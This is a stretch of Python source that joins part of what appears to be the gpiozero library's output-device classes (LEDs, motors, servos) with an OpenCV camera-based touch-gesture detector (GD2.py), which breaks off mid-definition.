(:attr:`value`) of 0.1, this will toggle it to 0.9, and so on. """ self._stop_blink() self.value = 1 - self.value @property def is_active(self): """ Returns ``True`` if the device is currently active (:attr:`value` is non-zero) and ``False`` otherwise. """ return self.value != 0 @property def frequency(self): """ The frequency of the pulses used with the PWM device, in Hz. The default is 100Hz. """ return self.pin.frequency @frequency.setter def frequency(self, value): self.pin.frequency = value def blink( self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0, n=None, background=True): """ Make the device turn on and off repeatedly. :param float on_time: Number of seconds on. Defaults to 1 second. :param float off_time: Number of seconds off. Defaults to 1 second. :param float fade_in_time: Number of seconds to spend fading in. Defaults to 0. :param float fade_out_time: Number of seconds to spend fading out. Defaults to 0. :param int n: Number of times to blink; ``None`` (the default) means forever. :param bool background: If ``True`` (the default), start a background thread to continue blinking and return immediately. If ``False``, only return when the blink is finished (warning: the default value of *n* will result in this method never returning). """ self._stop_blink() self._blink_thread = GPIOThread( target=self._blink_device, args=(on_time, off_time, fade_in_time, fade_out_time, n) ) self._blink_thread.start() if not background: self._blink_thread.join() self._blink_thread = None def pulse(self, fade_in_time=1, fade_out_time=1, n=None, background=True): """ Make the device fade in and out repeatedly. :param float fade_in_time: Number of seconds to spend fading in. Defaults to 1. :param float fade_out_time: Number of seconds to spend fading out. Defaults to 1. :param int n: Number of times to pulse; ``None`` (the default) means forever. :param bool background: If ``True`` (the default), start a background thread to continue pulsing and return immediately. If ``False``, only return when the pulse is finished (warning: the default value of *n* will result in this method never returning). """ on_time = off_time = 0 self.blink( on_time, off_time, fade_in_time, fade_out_time, n, background ) def _stop_blink(self): if self._controller: self._controller._stop_blink(self) self._controller = None if self._blink_thread: self._blink_thread.stop() self._blink_thread = None def _blink_device( self, on_time, off_time, fade_in_time, fade_out_time, n, fps=25): sequence = [] if fade_in_time > 0: sequence += [ (i * (1 / fps) / fade_in_time, 1 / fps) for i in range(int(fps * fade_in_time)) ] sequence.append((1, on_time)) if fade_out_time > 0: sequence += [ (1 - (i * (1 / fps) / fade_out_time), 1 / fps) for i in range(int(fps * fade_out_time)) ] sequence.append((0, off_time)) sequence = ( cycle(sequence) if n is None else chain.from_iterable(repeat(sequence, n)) ) for value, delay in sequence: self._write(value) if self._blink_thread.stopping.wait(delay): break class PWMLED(PWMOutputDevice): """ Extends :class:`PWMOutputDevice` and represents a light emitting diode (LED) with variable brightness. A typical configuration of such a device is to connect a GPIO pin to the anode (long leg) of the LED, and the cathode (short leg) to ground, with an optional resistor to prevent the LED from burning out. :param int pin: The GPIO pin which the LED is attached to. See :ref:`pin-numbering` for valid pin numbers. :param bool active_high: If ``True`` (the default), the :meth:`on` method will set the GPIO to HIGH. If ``False``, the :meth:`on` method will set the GPIO to LOW (the :meth:`off` method always does the opposite). :param float initial_value: If ``0`` (the default), the LED will be off initially. Other values between 0 and 1 can be specified as an initial brightness for the LED. Note that ``None`` cannot be specified (unlike the parent class) as there is no way to tell PWM not to alter the state of the pin. :param int frequency: The frequency (in Hz) of pulses emitted to drive the LED. Defaults to 100Hz. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ pass PWMLED.is_lit = PWMLED.is_active class RGBLED(SourceMixin, Device): """ Extends :class:`Device` and represents a full color LED component (composed of red, green, and blue LEDs). Connect the common cathode (longest leg) to a ground pin; connect each of the other legs (representing the red, green, and blue anodes) to any GPIO pins. You can either use three limiting resistors (one per anode) or a single limiting resistor on the cathode. The following code will make the LED purple:: from gpiozero import RGBLED led = RGBLED(2, 3, 4) led.color = (1, 0, 1) :param int red: The GPIO pin that controls the red component of the RGB LED. :param int green: The GPIO pin that controls the green component of the RGB LED. :param int blue: The GPIO pin that controls the blue component of the RGB LED. :param bool active_high: Set to ``True`` (the default) for common cathode RGB LEDs. If you are using a common anode RGB LED, set this to ``False``. :param tuple initial_value: The initial color for the RGB LED. Defaults to black ``(0, 0, 0)``. :param bool pwm: If ``True`` (the default), construct :class:`PWMLED` instances for each component of the RGBLED. If ``False``, construct regular :class:`LED` instances, which prevents smooth color graduations. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__( self, red=None, green=None, blue=None, active_high=True, initial_value=(0, 0, 0), pwm=True, pin_factory=None): self._leds = () self._blink_thread = None if not all(p is not None for p in [red, green, blue]): raise GPIOPinMissing('red, green, and blue pins must be provided') LEDClass = PWMLED if pwm else LED super(RGBLED, self).__init__(pin_factory=pin_factory) self._leds = tuple( LEDClass(pin, active_high, pin_factory=pin_factory) for pin in (red, green, blue) ) self.value = initial_value def close(self): if getattr(self, '_leds', None): self._stop_blink() for led in self._leds: led.close() self._leds = () super(RGBLED, self).close() @property def closed(self): return len(self._leds) == 0 @property def value(self): """ Represents the color of the LED as an RGB 3-tuple of ``(red, green, blue)`` where each value is between 0 and 1 if ``pwm`` was ``True`` when the class was constructed (and only 0 or 1 if not). For example, red would be ``(1, 0, 0)`` and yellow would be ``(1, 1, 0)``, while orange would be ``(1, 0.5, 0)``. """ return tuple(led.value for led in self._leds) @value.setter def value(self, value): for component in value: if not 0 <= component <= 1: raise OutputDeviceBadValue('each RGB color component must be between 0 and 1') if isinstance(self._leds[0], LED): if component not in (0, 1): raise OutputDeviceBadValue('each RGB color component must be 0 or 1 with non-PWM RGBLEDs') self._stop_blink() for led, v in zip(self._leds, value): led.value = v @property def is_active(self): """ Returns ``True`` if the LED is currently active (not black) and ``False`` otherwise. """ return self.value != (0, 0, 0) is_lit = is_active @property def color(self): """ Represents the color of the LED as a :class:`~colorzero.Color` object. """ return Color(*self.value) @color.setter def color(self, value): self.value = value @property def red(self): """ Represents the red element of the LED as a :class:`~colorzero.Red` object. """ return self.color.red @red.setter def red(self, value): self._stop_blink() r, g, b = self.value self.value = value, g, b @property def green(self): """ Represents the green element of the LED as a :class:`~colorzero.Green` object. """ return self.color.green @green.setter def green(self, value): self._stop_blink() r, g, b = self.value self.value = r, value, b @property def blue(self): """ Represents the blue element of the LED as a :class:`~colorzero.Blue` object. """ return self.color.blue @blue.setter def blue(self, value): self._stop_blink() r, g, b = self.value self.value = r, g, value def on(self): """ Turn the LED on. This equivalent to setting the LED color to white ``(1, 1, 1)``. """ self.value = (1, 1, 1) def off(self): """ Turn the LED off. This is equivalent to setting the LED color to black ``(0, 0, 0)``. """ self.value = (0, 0, 0) def toggle(self): """ Toggle the state of the device. If the device is currently off (:attr:`value` is ``(0, 0, 0)``), this changes it to "fully" on (:attr:`value` is ``(1, 1, 1)``). If the device has a specific color, this method inverts the color. """ r, g, b = self.value self.value = (1 - r, 1 - g, 1 - b) def blink( self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0, on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True): """ Make the device turn on and off repeatedly. :param float on_time: Number of seconds on. Defaults to 1 second. :param float off_time: Number of seconds off. Defaults to 1 second. :param float fade_in_time: Number of seconds to spend fading in. Defaults to 0. Must be 0 if ``pwm`` was ``False`` when the class was constructed (:exc:`ValueError` will be raised if not). :param float fade_out_time: Number of seconds to spend fading out. Defaults to 0. Must be 0 if ``pwm`` was ``False`` when the class was constructed (:exc:`ValueError` will be raised if not). :param tuple on_color: The color to use when the LED is "on". Defaults to white. :param tuple off_color: The color to use when the LED is "off". Defaults to black. :param int n: Number of times to blink; ``None`` (the default) means forever. :param bool background: If ``True`` (the default), start a background thread to continue blinking and return immediately. If ``False``, only return when the blink is finished (warning: the default value of *n* will result in this method never returning). """ if isinstance(self._leds[0], LED): if fade_in_time: raise ValueError('fade_in_time must be 0 with non-PWM RGBLEDs') if fade_out_time: raise ValueError('fade_out_time must be 0 with non-PWM RGBLEDs') self._stop_blink() self._blink_thread = GPIOThread( target=self._blink_device, args=( on_time, off_time, fade_in_time, fade_out_time, on_color, off_color, n ) ) self._blink_thread.start() if not background: self._blink_thread.join() self._blink_thread = None def pulse( self, fade_in_time=1, fade_out_time=1, on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True): """ Make the device fade in and out repeatedly. :param float fade_in_time: Number of seconds to spend fading in. Defaults to 1. :param float fade_out_time: Number of seconds to spend fading out. Defaults to 1. :param tuple on_color: The color to use when the LED is "on". Defaults to white. :param tuple off_color: The color to use when the LED is "off". Defaults to black. :param int n: Number of times to pulse; ``None`` (the default) means forever. :param bool background: If ``True`` (the default), start a background thread to continue pulsing and return immediately. If ``False``, only return when the pulse is finished (warning: the default value of *n* will result in this method never returning). """ on_time = off_time = 0 self.blink( on_time, off_time, fade_in_time, fade_out_time, on_color, off_color, n, background ) def _stop_blink(self, led=None): # If this is called with a single led, we stop all blinking anyway if self._blink_thread: self._blink_thread.stop() self._blink_thread = None def _blink_device( self, on_time, off_time, fade_in_time, fade_out_time, on_color, off_color, n, fps=25): # Define some simple lambdas to perform linear interpolation between # off_color and on_color lerp = lambda t, fade_in: tuple( (1 - t) * off + t * on if fade_in else (1 - t) * on + t * off for off, on in zip(off_color, on_color) ) sequence = [] if fade_in_time > 0: sequence += [ (lerp(i * (1 / fps) / fade_in_time, True), 1 / fps) for i in range(int(fps * fade_in_time)) ] sequence.append((on_color, on_time)) if fade_out_time > 0: sequence += [ (lerp(i * (1 / fps) / fade_out_time, False), 1 / fps) for i in range(int(fps * fade_out_time)) ] sequence.append((off_color, off_time)) sequence = ( cycle(sequence) if n is None else chain.from_iterable(repeat(sequence, n)) ) for l in self._leds: l._controller = self for value, delay in sequence: for l, v in zip(self._leds, value): l._write(v) if self._blink_thread.stopping.wait(delay): break class Motor(SourceMixin, CompositeDevice): """ Extends :class:`CompositeDevice` and represents a generic motor connected to a bi-directional motor driver circuit (i.e. an `H-bridge`_). Attach an `H-bridge`_ motor controller to your Pi; connect a power source (e.g. a battery pack or the 5V pin) to the controller; connect the outputs of the controller board to the two terminals of the motor; connect the inputs of the controller board to two GPIO pins. .. _H-bridge: https://en.wikipedia.org/wiki/H_bridge The following code will make the motor turn "forwards":: from gpiozero import Motor motor = Motor(17, 18) motor.forward() :param int forward: The GPIO pin that the forward input of the motor driver chip is connected to. :param int backward: The GPIO pin that the backward input of the motor driver chip is connected to. :param int enable: (Optional) The GPIO pin that enables the motor. Required for some motor controller boards. Defaults to ``None``. :param bool pwm: If ``True`` (the default), construct :class:`PWMOutputDevice` instances for the motor controller pins, allowing both direction and variable speed control. If ``False``, construct :class:`DigitalOutputDevice` instances, allowing only direction control. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__(self, forward=None, backward=None, enable=None, pwm=True, pin_factory=None): if not all(p is not None for p in [forward, backward]): raise GPIOPinMissing( 'forward and backward pins must be provided' ) PinClass = PWMOutputDevice if pwm else DigitalOutputDevice devices = OrderedDict(( ('forward_device', PinClass(forward)), ('backward_device', PinClass(backward)), )) if enable is not None: devices['enable_device'] = DigitalOutputDevice(enable, initial_value=True) super(Motor, self).__init__(_order=devices.keys(), **devices) @property def value(self): """ Represents the speed of the motor as a floating point value between -1 (full speed backward) and 1 (full speed forward), with 0 representing stopped. """ return self.forward_device.value - self.backward_device.value @value.setter def value(self, value): if not -1 <= value <= 1: raise OutputDeviceBadValue("Motor value must be between -1 and 1") if value > 0: try: self.forward(value) except ValueError as e: raise OutputDeviceBadValue(e) elif value < 0: try: self.backward(-value) except ValueError as e: raise OutputDeviceBadValue(e) else: self.stop() @property def is_active(self): """ Returns ``True`` if the motor is currently running and ``False`` otherwise. """ return self.value != 0 def forward(self, speed=1): """ Drive the motor forwards. :param float speed: The speed at which the motor should turn. Can be any value between 0 (stopped) and the default 1 (maximum speed) if ``pwm`` was ``True`` when the class was constructed (and only 0 or 1 if not). """ if not 0 <= speed <= 1: raise ValueError('forward speed must be between 0 and 1') if isinstance(self.forward_device, DigitalOutputDevice): if speed not in (0, 1): raise ValueError('forward speed must be 0 or 1 with non-PWM Motors') self.backward_device.off() self.forward_device.value = speed def backward(self, speed=1): """ Drive the motor backwards. :param float speed: The speed at which the motor should turn. Can be any value between 0 (stopped) and the default 1 (maximum speed) if ``pwm`` was ``True`` when the class was constructed (and only 0 or 1 if not). """ if not 0 <= speed <= 1: raise ValueError('backward speed must be between 0 and 1') if isinstance(self.backward_device, DigitalOutputDevice): if speed not in (0, 1): raise ValueError('backward speed must be 0 or 1 with non-PWM Motors') self.forward_device.off() self.backward_device.value = speed def reverse(self): """ Reverse the current direction of the motor. If the motor is currently idle this does nothing. Otherwise, the motor's direction will be reversed at the current speed. """ self.value = -self.value def stop(self): """ Stop the motor. """ self.forward_device.off() self.backward_device.off() class PhaseEnableMotor(SourceMixin, CompositeDevice): """ Extends :class:`CompositeDevice` and represents a generic motor connected to a Phase/Enable motor driver circuit; the phase of the driver controls whether the motor turns forwards or backwards, while enable controls the speed with PWM. The following code will make the motor turn "forwards":: from gpiozero import PhaseEnableMotor motor = PhaseEnableMotor(12, 5) motor.forward() :param int phase: The GPIO pin that the phase (direction) input of the motor driver chip is connected to. :param int enable: The GPIO pin that the enable (speed) input of the motor driver chip is connected to. :param bool pwm: If ``True`` (the default), construct :class:`PWMOutputDevice` instances for the motor controller pins, allowing both direction and variable speed control. If ``False``, construct :class:`DigitalOutputDevice` instances, allowing only direction control. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__(self, phase=None, enable=None, pwm=True, pin_factory=None): if not all([phase, enable]): raise GPIOPinMissing('phase and enable pins must be provided') PinClass = PWMOutputDevice if pwm else DigitalOutputDevice super(PhaseEnableMotor, self).__init__( phase_device=DigitalOutputDevice(phase, pin_factory=pin_factory), enable_device=PinClass(enable, pin_factory=pin_factory), _order=('phase_device', 'enable_device'), pin_factory=pin_factory ) @property def value(self): """ Represents the speed of the motor as a floating point value between -1 (full speed backward) and 1 (full speed forward). """ return -self.enable_device.value if self.phase_device.is_active else self.enable_device.value @value.setter def value(self, value): if not -1 <= value <= 1: raise OutputDeviceBadValue("Motor value must be between -1 and 1") if value > 0: self.forward(value) elif value < 0: self.backward(-value) else: self.stop() @property def is_active(self): """ Returns ``True`` if the motor is currently running and ``False`` otherwise. """ return self.value != 0 def forward(self, speed=1): """ Drive the motor forwards. :param float speed: The speed at which the motor should turn. Can be any value between 0 (stopped) and the default 1 (maximum speed). """ if isinstance(self.enable_device, DigitalOutputDevice): if speed not in (0, 1): raise ValueError('forward speed must be 0 or 1 with non-PWM Motors') self.enable_device.off() self.phase_device.off() self.enable_device.value = speed def backward(self, speed=1): """ Drive the motor backwards. :param float speed: The speed at which the motor should turn. Can be any value between 0 (stopped) and the default 1 (maximum speed). """ if isinstance(self.enable_device, DigitalOutputDevice): if speed not in (0, 1): raise ValueError('backward speed must be 0 or 1 with non-PWM Motors') self.enable_device.off() self.phase_device.on() self.enable_device.value = speed def reverse(self): """ Reverse the current direction of the motor. If the motor is currently idle this does nothing. Otherwise, the motor's direction will be reversed at the current speed. """ self.value = -self.value def stop(self): """ Stop the motor. """ self.enable_device.off() class Servo(SourceMixin, CompositeDevice): """ Extends :class:`CompositeDevice` and represents a PWM-controlled servo motor connected to a GPIO pin. Connect a power source (e.g. a battery pack or the 5V pin) to the power cable of the servo (this is typically colored red); connect the ground cable of the servo (typically colored black or brown) to the negative of your battery pack, or a GND pin; connect the final cable (typically colored white or orange) to the GPIO pin you wish to use for controlling the servo. The following code will make the servo move between its minimum, maximum, and mid-point positions with a pause between each:: from gpiozero import Servo from time import sleep servo = Servo(17) while True: servo.min() sleep(1) servo.mid() sleep(1) servo.max() sleep(1) :param int pin: The GPIO pin which the device is attached to. See :ref:`pin-numbering` for valid pin numbers. :param float initial_value: If ``0`` (the default), the device's mid-point will be set initially. Other values between -1 and +1 can be specified as an initial position. ``None`` means to start the servo un-controlled (see :attr:`value`). :param float min_pulse_width: The pulse width corresponding to the servo's minimum position. This defaults to 1ms. :param float max_pulse_width: The pulse width corresponding to the servo's maximum position. This defaults to 2ms. :param float frame_width: The length of time between servo control pulses measured in seconds. This defaults to 20ms which is a common value for servos. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__( self, pin=None, initial_value=0.0, min_pulse_width=1/1000, max_pulse_width=2/1000, frame_width=20/1000, pin_factory=None): if min_pulse_width >= max_pulse_width: raise ValueError('min_pulse_width must be less than max_pulse_width') if max_pulse_width >= frame_width: raise ValueError('max_pulse_width must be less than frame_width') self._frame_width = frame_width self._min_dc = min_pulse_width / frame_width self._dc_range = (max_pulse_width - min_pulse_width) / frame_width self._min_value = -1 self._value_range = 2 super(Servo, self).__init__( pwm_device=PWMOutputDevice( pin, frequency=int(1 / frame_width), pin_factory=pin_factory ), pin_factory=pin_factory ) try: self.value = initial_value except: self.close() raise @property def frame_width(self): """ The time between control pulses, measured in seconds. """ return self._frame_width @property def min_pulse_width(self): """ The control pulse width corresponding to the servo's minimum position, measured in seconds. """ return self._min_dc * self.frame_width @property def max_pulse_width(self): """ The control pulse width corresponding to the servo's maximum position, measured in seconds. """ return (self._dc_range * self.frame_width) + self.min_pulse_width @property def pulse_width(self): """ Returns the current pulse width controlling the servo. """ if self.pwm_device.pin.frequency is None: return None else: return self.pwm_device.pin.state * self.frame_width def min(self): """ Set the servo to its minimum position. """ self.value = -1 def mid(self): """ Set the servo to its mid-point position. """ self.value = 0 def max(self): """ Set the servo to its maximum position. """ self.value = 1 def detach(self): """ Temporarily disable control of the servo. This is equivalent to setting :attr:`value` to ``None``. """ self.value = None def _get_value(self): if self.pwm_device.pin.frequency is None: return None else: return ( ((self.pwm_device.pin.state - self._min_dc) / self._dc_range) * self._value_range + self._min_value) @property def value(self): """ Represents the position of the servo as a value between -1 (the minimum position) and +1 (the maximum position). This can also be the special value ``None`` indicating that the servo is currently "uncontrolled", i.e. that no control signal is being sent. Typically this means the servo's position remains unchanged, but that it can be moved by hand. """ result = self._get_value() if result is None: return result else: # NOTE: This round() only exists to ensure we don't confuse people # by returning 2.220446049250313e-16 as the default initial value # instead of 0. The reason _get_value and _set_value are split # out is for descendents that require the un-rounded values for # accuracy return round(result, 14) @value.setter def value(self, value): if value is None: self.pwm_device.pin.frequency = None elif -1 <= value <= 1: self.pwm_device.pin.frequency = int(1 / self.frame_width) self.pwm_device.pin.state = ( self._min_dc + self._dc_range * ((value - self._min_value) / self._value_range) ) else: raise OutputDeviceBadValue( "Servo value must be between -1 and 1, or None") @property def is_active(self): return self.value is not None class AngularServo(Servo): """ Extends :class:`Servo` and represents a rotational PWM-controlled servo motor which can be set to particular angles (assuming valid minimum and maximum angles are provided to the constructor). Connect a power source (e.g. a battery pack or the 5V pin) to the power cable of the servo (this is typically colored red); connect the ground cable of the servo (typically colored black or brown) to the negative of your battery pack, or a GND pin; connect the final cable (typically colored white or orange) to the GPIO pin you wish to use for controlling the servo. Next, calibrate the angles that the servo can rotate to. In an interactive Python session, construct a :class:`Servo` instance. The servo should move to its mid-point by default. Set the servo to its minimum value, and measure the angle from the mid-point. Set the servo to its maximum value, and again measure the angle:: >>> from gpiozero import Servo >>> s = Servo(17) >>> s.min() # measure the angle >>> s.max() # measure the angle You should now be able to construct an :class:`AngularServo` instance with the correct bounds:: >>> from gpiozero import AngularServo >>> s = AngularServo(17, min_angle=-42, max_angle=44) >>> s.angle = 0.0 >>> s.angle 0.0 >>> s.angle = 15 >>> s.angle 15.0 .. note:: You can set *min_angle* greater than *max_angle* if you wish to reverse the sense of the angles (e.g. ``min_angle=45, max_angle=-45``). This can be useful with servos that rotate in the opposite direction to your expectations of minimum and maximum. :param int pin: The GPIO pin which the device is attached to. See :ref:`pin-numbering` for valid pin numbers. :param float initial_angle: Sets the servo's initial angle to the specified value. The default is 0. The value specified must be between *min_angle* and *max_angle* inclusive. ``None`` means to start the servo un-controlled (see :attr:`value`). :param float min_angle: Sets the minimum angle that the servo can rotate to. This defaults to -90, but should be set to whatever you measure from your servo during calibration. :param float max_angle: Sets the maximum angle that the servo can rotate to. This defaults to 90, but should be set to whatever you measure from your servo during calibration. :param float min_pulse_width: The pulse width corresponding to the servo's minimum position. This defaults to 1ms. :param float max_pulse_width: The pulse width corresponding to the servo's maximum position. This defaults to 2ms. :param float frame_width: The length of time between servo control pulses measured in seconds. This defaults to 20ms which is a common value for servos. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__( self, pin=None, initial_angle=0.0, min_angle=-90, max_angle=90, min_pulse_width=1/1000, max_pulse_width=2/1000, frame_width=20/1000, pin_factory=None): self._min_angle = min_angle self._angular_range = max_angle - min_angle if initial_angle is None: initial_value = None elif ((min_angle <= initial_angle <= max_angle) or (max_angle <= initial_angle <= min_angle)): initial_value = 2 * ((initial_angle - min_angle) / self._angular_range) - 1 else: raise OutputDeviceBadValue( "AngularServo angle must be between %s and %s, or None" % (min_angle, max_angle)) super(AngularServo, self).__init__( pin, initial_value, min_pulse_width, max_pulse_width, frame_width, pin_factory=pin_factory ) @property def min_angle(self): """ The minimum angle that the servo will rotate to when :meth:`min` is called. """ return self._min_angle @property def max_angle(self): """ The maximum angle that the servo will rotate to when :meth:`max` is called. """ return self._min_angle + self._angular_range @property def angle(self): """ The position of the servo as an angle measured in degrees. This will only be accurate if *min_angle* and *max_angle* have been set appropriately in the constructor. This can also be the special value ``None`` indicating that the servo is currently "uncontrolled", i.e. that no control signal is being sent. Typically this means the servo's position remains unchanged, but that it can be moved by hand. """ result = self._get_value() if result is None: return None else: # NOTE: Why round(n, 12) here instead of 14? Angle ranges can be # much larger than -1..1 so we need a little more rounding to # smooth off the rough corners! return round( self._angular_range * ((result - self._min_value) / self._value_range) + self._min_angle, 12) @angle.setter def angle(self, angle): if angle is None: self.value = None elif ((self.min_angle <= angle <= self.max_angle) or (self.max_angle <= angle <= self.min_angle)): self.value = ( self._value_range * ((angle - self._min_angle) / self._angular_range) + self._min_value) else: raise OutputDeviceBadValue( "AngularServo angle must be between %s and %s, or None" % (self.min_angle, self.max_angle))
GD2.py
import math import threading from enum import Enum from Touch_Detector import Touch_Detector from datetime import datetime import cv2 class Gestures(Enum): NO_GESTURE=0 THREE_PRESS_HOLD=1 # back to previous board FOUR_PRESS_HOLD=2 # reset to 4*4 SWIPE_UP=3 SWIPE_DOWN=4 SWIPE_LEFT=5 SWIPE_RIGHT=6 PINCH=7 # change, VK_CHANGE, c PALM_PRESSING=8 class Single_Gestures(Enum): NO_GESTURE=0 PRESS_HOLD=1 SWIPE=2 class GD2: def __init__(self, min_wait_frame=6, min_prep_wait_frame=3, pinch_x_min_dist=2, pinch_y_min_dist=4, swipe_min_dist=50, palm_pressing_threshold=640 * 480 / 5, palm_pressing_missing_threshold=30, debug_mode=True): self.history = Ellipse_History() self.min_wait_frame = min_wait_frame self.min_prep_wait_frame = min_prep_wait_frame self.pinch_x_min_dist = pinch_x_min_dist self.pinch_y_min_dist = pinch_y_min_dist self.debug_mode = debug_mode self.swipe_min_dist = swipe_min_dist self.palm_pressing_threshold = palm_pressing_threshold self.palm_pressing_missing_threshold = palm_pressing_missing_threshold self.palm_pressing_status = {"is_triggered":False, "not_pressed_ct":0} self.gesture = None self._t_effector = threading.Thread(target=self.initGestureDetector) self._t_effector.daemon = True # "before the start`" self._t_effector.start() def print_single_gestures(self): printed = False for i,d in self.history.history.items(): printed = True print(i,": ",d["gesture"],end=" ") if printed: print() def add_ellipses(self,list_of_ellipses): self.history.add_many(list_of_ellipses) def detect_palm_pressing(self, thresholded_img, hist): for i,d in hist.items(): if d["is_triggered"]: return Gestures.NO_GESTURE white_pixels_ct = cv2.countNonZero(thresholded_img) is_pressing = white_pixels_ct > self.palm_pressing_threshold gesture = Gestures.NO_GESTURE if is_pressing: if not self.palm_pressing_status["is_triggered"]: gesture = Gestures.PALM_PRESSING self.palm_pressing_status["is_triggered"] = True else: self.palm_pressing_status["not_pressed_ct"]+=1 if self.palm_pressing_status["not_pressed_ct"]>self.palm_pressing_missing_threshold: self.palm_pressing_status["not_pressed_ct"]=0 self.palm_pressing_status["is_triggered"] = False return gesture def detect_gesture(self, thresholded_img): hist = self.history.history gesture = self.detect_palm_pressing(thresholded_img,hist) if gesture == gesture.NO_GESTURE and not self.palm_pressing_status["is_triggered"]: for i,d in hist.items(): if not d["is_triggered"]: if len(d["history"])>self.min_wait_frame: single_hist = d["history"] gesture, value = self.process_single_gesture(single_hist) hist[i]["gesture"] = gesture hist[i]["value"] = value hist[i]["is_in_detect_state"] = True hist[i]["is_in_prep_state"] = True elif len(d["history"])>self.min_prep_wait_frame: single_hist = d["history"] gesture, value = self.process_single_gesture(single_hist) hist[i]["gesture"] = gesture hist[i]["value"] = value hist[i]["is_in_prep_state"] = True gesture = self.process_gesture(hist) #self.print_single_gestures() return gesture def process_gesture(self,hist): final_gesture = Gestures.NO_GESTURE hold_ct = 0 hold_prep_ct = 0 holds = {} holds_prep = {} swipe_ct = 0 swipe_prep_ct = 0 swipes = {} swipes_prep = {} for i,d in hist.items(): if d["is_triggered"]: return Gestures.NO_GESTURE if not d["is_triggered"]: if d["gesture"] == Single_Gestures.PRESS_HOLD: hold_prep_ct+=1 holds_prep[i] = d["value"] if d["is_in_detect_state"]: hold_ct+=1 holds[i] = d["value"] elif d["gesture"] == Single_Gestures.SWIPE: swipe_prep_ct+=1 swipes_prep[i] = d["value"] if d["is_in_detect_state"]: swipe_ct+=1 swipes[i] = d["value"] # if self.debug_mode: # if len(hist)>0: # print("Hold: ", hold_ct, hold_prep_ct, "Swipe: ", swipe_ct, swipe_prep_ct) if swipe_prep_ct==2 and swipe_ct>0: # Detect Pinch if self.debug_mode: print("Detect Pinch") v1, v2 = list(swipes_prep.values()) dex1, dey1 = v1 dex2, dey2 = v2 is_x_pinch = False is_y_pinch = False if abs(dex1)>self.pinch_x_min_dist and abs(dex2)>self.pinch_x_min_dist: if dex2*dex1<0: # different sign is_x_pinch=True if abs(dey1)>self.pinch_y_min_dist and abs(dey2)>self.pinch_y_min_dist: if dey2*dey1<0: # different sign is_y_pinch=True #TODO: Robustness improvement on distinguishing other similar gestures for i in swipes_prep: hist[i]["is_triggered"] = True if is_x_pinch or is_y_pinch: final_gesture = Gestures.PINCH elif swipe_ct == 1: if self.debug_mode: print("Detect 1 swip") itmp = list(swipes.keys())[0] vtmp = list(swipes.values())[0] dex, dey = vtmp hist[itmp]["is_triggered"] = True if abs(dex)<0.5*abs(dey) and abs(dey)>self.swipe_min_dist: # up or down # up & down reversed due to cam angle if dey<0: final_gesture = Gestures.SWIPE_DOWN else: final_gesture = Gestures.SWIPE_UP elif abs(dey)<0.5*abs(dex) and abs(dex)>self.swipe_min_dist: # left or right if dex<0: final_gesture = Gestures.SWIPE_LEFT else: final_gesture = Gestures.SWIPE_RIGHT elif hold_prep_ct==3 and hold_ct>0: if self.debug_mode: print("Detect 3 hold") for i in holds_prep: hist[i]["is_triggered"] = True final_gesture = Gestures.THREE_PRESS_HOLD elif hold_prep_ct==4 and hold_ct>0: if self.debug_mode: print("Detect 4 hold") for i in holds_prep: hist[i]["is_triggered"] = True final_gesture = Gestures.FOUR_PRESS_HOLD # else: # if self.debug_mode: # print("Hold: ",hold_ct,hold_prep_ct, "Swipe: ",swipe_ct,swipe_prep_ct) return final_gesture def process_single_gesture(self, history_ellipses): gesture = Single_Gestures.NO_GESTURE value = [] first = history_ellipses[0] last = history_ellipses[-1] xf,yf = first[0] xl,yl = last[0] dex = xl-xf #delta_end_x dey = yl-yf if abs(dex)+abs(dey) < 20: gesture = Single_Gestures.PRESS_HOLD else: gesture = Single_Gestures.SWIPE value = [dex,dey] return gesture,value def getGesture(self): return self.gesture def initGestureDetector(self): grayscale_threshold = 130 touch_detector = Touch_Detector(grayscale_threshold=grayscale_threshold, width_height_ratio_threshold=0.3, min_touch_area=500, max_touch_area=7000) def change_grayscale_threshold(x): touch_detector.grayscale_threshold = x def change_min_area_threshold(x): touch_detector.min_touch_area = x def change_max_area_threshold(x): touch_detector.max_touch_area = x # gesture_detector = Gesture_Detector() # camera_port = "out2.avi" camera_port = 1 camera = cv2.VideoCapture(camera_port) cv2.namedWindow('image') cv2.createTrackbar('GrayscaleMinValue', 'image', 0, 255, change_grayscale_threshold) cv2.setTrackbarPos('GrayscaleMinValue', 'image', grayscale_threshold) cv2.createTrackbar('Min Area', 'image', 10, 1000, change_min_area_threshold) cv2.setTrackbarPos('Min Area', 'image', 500) cv2.createTrackbar('Max Area', 'image', 10, 10000, change_max_area_threshold) cv2.setTrackbarPos('Max Area', 'image', 7000) while True: ok, frame = camera.read() if ok: gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) ellipses = touch_detector.get_touch_ellipses(gray_frame) self.add_ellipses(ellipses) self.gesture = self.detect_gesture(touch_detector.get_current_thresholded_image()) if self.gesture is not Gestures.NO_GESTURE: print(datetime.now(), self.gesture) rgb_frame = cv2.cvtColor(gray_frame, cv2.COLOR_GRAY2BGR) image = touch_detector.visualize(ellipses=ellipses, image=rgb_frame) cv2.imshow("image", image) cv2.moveWindow("image", 1, 1) cv2.waitKey(1) class Ellipse_History: def __init__(self): self.history = {} self.id = 0 self.not_detected_upper_bound = 3 def add_one(self, ellipse): id = self.get_ellipse_id(ellipse) if id in self.history: self.history[id]["history"].append(ellipse) self.history[id]["not_detected_ct"] = 0 else: self.history[id] = {"is_triggered":False, "is_in_prep_state":False, "is_in_detect_state":False, "not_detected_ct":0, "history":[ellipse], "gesture":Single_Gestures.NO_GESTURE, "value":[]} return id def add_many(self,list_of_ellipses): added_id = set() for ellipse in list_of_ellipses: added_id.add(self.add_one(ellipse)) outdated_keys = [] for i in self.history: if i not in added_id: self.history[i]["not_detected_ct"]+=1 if self.history[i]["not_detected_ct"]>self.not_detected_upper_bound: outdated_keys.append(i) for i in outdated_keys: del self.history[i] def 